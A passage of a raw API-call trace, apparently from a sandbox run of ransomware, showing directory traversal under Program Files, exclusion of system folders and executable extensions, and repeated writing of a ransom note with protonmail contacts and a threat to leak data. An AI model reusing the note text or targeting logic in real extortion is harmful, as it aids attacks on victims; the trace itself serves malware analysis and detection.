(lpFirst="Templates", lpSrch="tmp") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch="winnt") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch="temp") returned="Templates" [0137.724] StrStrIW (lpFirst="Templates", lpSrch=".UAKXC") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch=".exe") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch=".dll") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch=".lnk") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch=".sys") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch=".msi") returned 0x0 [0137.724] StrStrIW (lpFirst="Templates", lpSrch="R3ADM3.txt") returned 0x0 [0137.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd60 [0137.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd60 | out: hHeap=0xea0000) returned 1 [0137.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0137.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd60 [0137.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0137.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0137.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.725] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0137.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d10 | out: hHeap=0xea0000) returned 1 [0137.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66c8 | out: hHeap=0xea0000) returned 1 [0137.725] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.725] Sleep (dwMilliseconds=0x32) [0137.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3028 | out: hHeap=0xea0000) returned 1 [0137.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec31e0 | out: hHeap=0xea0000) returned 1 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xedab30 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeed390 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee4a0 [0137.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed390 | out: hHeap=0xea0000) returned 1 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee518 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee590 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0137.785] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xeed390 [0137.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0137.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee590 | out: hHeap=0xea0000) returned 1 [0137.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66c8 | out: hHeap=0xea0000) returned 1 [0137.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.786] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.786] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.787] CloseHandle (hObject=0x6c4) returned 1 [0137.790] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed390 | out: hHeap=0xea0000) returned 1 [0137.790] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee518 | out: hHeap=0xea0000) returned 1 [0137.790] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57d69fb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57d69fb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.790] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.790] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57d69fb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57d69fb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.790] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.790] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.790] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d69fb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57d69fb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57d69fb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.790] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.790] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.790] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.790] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.790] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.790] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.790] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.790] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.790] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.790] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0137.790] lstrcmpW (lpString1="v3.5", lpString2=".") returned 1 [0137.791] lstrcmpW (lpString1="v3.5", lpString2="..") returned 1 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="tmp") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="winnt") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="temp") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="thumb") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="$Recycle.Bin") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="System Volume Information") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="Boot") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="Windows") returned 0x0 [0137.791] StrStrIW (lpFirst="v3.5", lpSrch="Trend Micro") returned 0x0 [0137.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee518 [0137.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee590 [0137.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xeef488 [0137.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee590 | out: hHeap=0xea0000) returned 1 [0137.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee518 | out: hHeap=0xea0000) returned 1 [0137.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0137.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef488 | out: hHeap=0xea0000) returned 1 [0137.791] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb6cf610, ftCreationTime.dwHighDateTime=0x1d55e09, ftLastAccessTime.dwLowDateTime=0x9350cb10, ftLastAccessTime.dwHighDateTime=0x1d59439, ftLastWriteTime.dwLowDateTime=0x9350cb10, ftLastWriteTime.dwHighDateTime=0x1d59439, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="writers_attendance.exe", cAlternateFileName="WRITER~1.EXE")) returned 1 [0137.791] lstrcmpW (lpString1="writers_attendance.exe", lpString2=".") returned 1 [0137.791] lstrcmpW (lpString1="writers_attendance.exe", lpString2="..") returned 1 [0137.791] StrStrIW (lpFirst="writers_attendance.exe", lpSrch=".UAKXC") returned 0x0 [0137.791] StrStrIW (lpFirst="writers_attendance.exe", lpSrch=".exe") returned=".exe" [0137.791] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb6cf610, ftCreationTime.dwHighDateTime=0x1d55e09, ftLastAccessTime.dwLowDateTime=0x9350cb10, ftLastAccessTime.dwHighDateTime=0x1d59439, ftLastWriteTime.dwLowDateTime=0x9350cb10, ftLastWriteTime.dwHighDateTime=0x1d59439, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="writers_attendance.exe", cAlternateFileName="WRITER~1.EXE")) returned 0 [0137.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a00 | out: hHeap=0xea0000) returned 1 [0137.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6768 | out: hHeap=0xea0000) returned 1 [0137.791] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.792] Sleep (dwMilliseconds=0x32) [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee4a0 | out: hHeap=0xea0000) returned 1 [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd60 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebf48 [0137.854] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xedab30 [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebf48 | out: hHeap=0xea0000) returned 1 [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd60 | out: hHeap=0xea0000) returned 1 [0137.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft sync framework\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.855] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.855] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.856] CloseHandle (hObject=0x6c4) returned 1 [0137.856] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0137.857] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0137.857] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57e02530, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57e02530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.857] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.857] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57e02530, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57e02530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.857] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.857] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.857] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e0e500, ftCreationTime.dwHighDateTime=0x1d57762, ftLastAccessTime.dwLowDateTime=0x91b2e8d0, ftLastAccessTime.dwHighDateTime=0x1d5e4e6, ftLastWriteTime.dwLowDateTime=0x91b2e8d0, ftLastWriteTime.dwHighDateTime=0x1d5e4e6, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmailnotifierpro.exe", cAlternateFileName="GMAILN~1.EXE")) returned 1 [0137.857] lstrcmpW (lpString1="gmailnotifierpro.exe", lpString2=".") returned 1 [0137.857] lstrcmpW (lpString1="gmailnotifierpro.exe", lpString2="..") returned 1 [0137.857] StrStrIW (lpFirst="gmailnotifierpro.exe", lpSrch=".UAKXC") returned 0x0 [0137.857] StrStrIW (lpFirst="gmailnotifierpro.exe", lpSrch=".exe") returned=".exe" [0137.857] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57e02530, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57e02530, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57e02530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.857] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.857] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.857] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.857] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.858] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.858] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.858] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.858] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.858] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.858] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 1 [0137.858] lstrcmpW (lpString1="v1.0", lpString2=".") returned 1 [0137.858] lstrcmpW (lpString1="v1.0", lpString2="..") returned 1 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="tmp") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="winnt") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="temp") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="thumb") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="$Recycle.Bin") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="System Volume Information") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="Boot") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="Windows") returned 0x0 [0137.858] StrStrIW (lpFirst="v1.0", lpSrch="Trend Micro") returned 0x0 [0137.858] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0137.858] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0137.858] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0137.858] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd60 [0137.858] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0137.858] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0137.859] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 0 [0137.859] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee0108 | out: hHeap=0xea0000) returned 1 [0137.859] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6790 | out: hHeap=0xea0000) returned 1 [0137.859] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.859] Sleep (dwMilliseconds=0x32) [0138.010] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0138.010] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0138.010] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee4a0 [0138.010] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee518 [0138.010] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee590 [0138.010] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee518 | out: hHeap=0xea0000) returned 1 [0138.010] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee518 [0138.010] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6790 [0138.010] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0138.010] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee680 [0138.011] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0138.011] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee680 | out: hHeap=0xea0000) returned 1 [0138.011] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0138.011] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6790 | out: hHeap=0xea0000) returned 1 [0138.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft synchronization services\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0138.011] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0138.011] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0138.012] CloseHandle (hObject=0x6c4) returned 1 [0138.013] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0138.013] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee518 | out: hHeap=0xea0000) returned 1 [0138.013] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57f7f2f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57f7f2f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0138.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0138.013] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x57f7f2f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57f7f2f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.013] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0138.013] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0138.013] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ADO.NET", cAlternateFileName="")) returned 1 [0138.013] lstrcmpW (lpString1="ADO.NET", lpString2=".") returned 1 [0138.013] lstrcmpW (lpString1="ADO.NET", lpString2="..") returned 1 [0138.013] StrStrIW (lpFirst="ADO.NET", lpSrch="tmp") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="winnt") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="temp") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="thumb") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="$Recycle.Bin") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="$RECYCLE.BIN") returned 0x0 [0138.014] StrStrIW (lpFirst="ADO.NET", lpSrch="System Volume Information") returned 